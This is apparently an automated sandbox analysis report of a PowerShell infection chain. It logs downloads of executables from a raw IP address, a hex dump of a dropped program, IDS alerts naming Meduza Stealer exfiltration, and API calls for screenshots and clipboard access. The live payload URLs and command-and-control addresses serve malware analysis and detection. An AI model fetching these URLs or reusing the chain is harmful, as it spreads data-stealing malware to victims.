00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Dec 2024 07:52:54 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 09 Dec 2024 20:28:42 GMTETag: "13ba00-628dc35e76e87"Accept-Ranges: bytesContent-Length: 1292800Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 14 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 df 12 00 40 01 00 00 00 f0 13 00 e0 01 00 00 00 80 13 00 18 6c 00 00 00 00 00 00 00 00 00 00 00 00 14 00 3c 0d 00 00 d0 83 11 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 85 11 00 28 00 00 00 90 82 11 00 40 01 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 78 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 32 0d 00 00 10 00 00 00 34 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 a8 05 00 00 50 0d 00 00 aa 05 00 00 38 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 7c 00 00 00 00 13 00 00 5a 00 00 00 e2 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 6c 00 00 00 80 13 00 00 6e 00 00 00 3c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 13 00 00 02 00 00 00 aa 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 0d 00 00 00 00 14 00 00 0e 00 00 00 ac 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
              Source: Joe Sandbox ViewIP Address: 193.3.19.151 193.3.19.151
              Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
              Source: Joe Sandbox ViewASN Name: ARNES-NETAcademicandResearchNetworkofSloveniaSI ARNES-NETAcademicandResearchNetworkofSloveniaSI
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: api.ipify.org
              Source: unknownDNS query: name: api.ipify.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 147.45.47.15:80
              Source: Network trafficSuricata IDS: 2050807 - Severity 1 - ET MALWARE [ANY.RUN] Possible Meduza Stealer Exfiltration (TCP) : 192.168.2.5:49709 -> 193.3.19.151:15666
              Source: global trafficHTTP traffic detected: GET /iviewers.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Launcher.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15
              Source: global trafficHTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.15
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F4A30 recv,recv,closesocket,WSACleanup,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6F4A30
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: text/html; text/plain; */*Host: api.ipify.orgCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /iviewers.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Launcher.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15
              Source: global trafficHTTP traffic detected: GET /duschno.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.47.15Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: api.ipify.org
              Source: powershell.exe, 00000000.00000002.2101966913.0000021997FA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998973000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.15
              Source: powershell.exe, 00000000.00000002.2101966913.00000219975A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998973000.00000004.00000800.00020000.00000000.sdmp, script.ps1String found in binary or memory: http://147.45.47.15/Launcher.exe
              Source: Launcher.exe, 00000003.00000002.2242142779.0000000007AB1000.00000004.00000800.00020000.00000000.sdmp, iviewers.dll.0.drString found in binary or memory: http://147.45.47.15/duschno.exe
              Source: powershell.exe, 00000000.00000002.2101966913.00000219975A2000.00000004.00000800.00020000.00000000.sdmp, script.ps1String found in binary or memory: http://147.45.47.15/iviewers.dll
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2481151975.000001D9D30D4000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2257752558.000001D9D30C1000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481030999.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481002391.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2481151975.000001D9D30D4000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2257752558.000001D9D30C1000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481030999.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2481002391.000001D9D30D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh
              Source: powershell.exe, 00000000.00000002.2130097419.00000219A7525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2130097419.00000219A73E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000000.00000002.2101966913.0000021997371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2133704244.0000000004F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2159379282.0000000007AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000000.00000002.2138728163.00000219AF7AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000000.00000002.2101966913.0000021997371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000004.00000002.2133704244.0000000004F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjq
              Source: xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D072E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: xdnfl52f.civ.exe, 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org2O
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D3350000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D3350000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.2133704244.00000000050C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000000.00000002.2101966913.0000021997FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285551989.000001D9D3380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4e
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: powershell.exe, 00000000.00000002.2130097419.00000219A7525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2130097419.00000219A73E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101966913.0000021998AA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2153214302.0000000005FDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26E0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28EB000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2274061388.000001D9D256E000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28F3000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26E8000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D33F2000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D286C000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D2874000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32D8000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32D0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D33FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285551989.000001D9D3380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarket
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D3350000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285551989.000001D9D3380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285841959.000001D9D3351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26E0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28EB000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2274061388.000001D9D256E000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28F3000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26E8000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D33F2000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D286C000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D2874000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32D8000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32D0000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D33FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26EF000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2282519074.000001D9D3D08000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28FB000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D3402000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D287C000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26EF000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2282519074.000001D9D3D08000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28FB000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D3402000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D287C000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: xdnfl52f.civ.exe, 0000000A.00000003.2284749758.000001D9D26EF000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2282519074.000001D9D3D08000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D28FB000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2284883431.000001D9D3402000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2272752731.000001D9D287C000.00000004.00000020.00020000.00000000.sdmp, xdnfl52f.civ.exe, 0000000A.00000003.2285000101.000001D9D32DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_006790DA OpenClipboard,3_2_006790DA
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_00673450 GlobalAlloc,GlobalLock,StringFromGUID2,wsprintfW,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00673450
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_00672EF0 GlobalAlloc,GlobalLock,StringFromGUID2,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00672EF0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F5B70 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject,10_2_00007FF75A6F5B70

              System Summary

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Launcher.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\xdnfl52f.civ.exeJump to dropped file
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F9D30 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6F9D30
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6FA430 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,_invalid_parameter_noinfo_noreturn,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,10_2_00007FF75A6FA430
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_006796343_2_00679634
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EFB4A04_2_04EFB4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EFB4904_2_04EFB490
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A1B9010_2_00007FF75A6A1B90
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A4B7010_2_00007FF75A6A4B70
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6F5B7010_2_00007FF75A6F5B70
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6AECB010_2_00007FF75A6AECB0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6A2CA010_2_00007FF75A6A2CA0
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6D597010_2_00007FF75A6D5970
